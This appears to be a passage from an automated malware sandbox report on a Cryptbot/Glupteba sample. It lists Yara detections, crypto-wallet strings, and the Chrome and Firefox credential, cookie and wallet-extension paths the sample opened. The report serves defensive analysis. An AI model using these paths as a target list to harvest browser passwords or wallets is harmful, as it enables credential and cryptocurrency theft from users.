Code function: 10_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

10_2_00406831

Stealing of Sensitive Information:

Yara detected Cryptbot

Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR

Yara detected Glupteba

Source: Yara match

File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 7yyqdBJVGf.exe	String found in binary or memory: %AppData%\Electrum-btcp\wallets
Source: 7yyqdBJVGf.exe	String found in binary or memory: %AppData%\ElectronCash\wallets
Source: 7yyqdBJVGf.exe	String found in binary or memory: %AppData%\Jaxx\Local Storage
Source: 7yyqdBJVGf.exe	String found in binary or memory: %AppData%\Exodus\backup
Source: 7yyqdBJVGf.exe	String found in binary or memory: %AppData%\Exodus\backup

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi			Jump to behavior

Remote Access Functionality:

Yara detected Cryptbot

Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR

Yara detected Glupteba

Source: Yara match

File source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR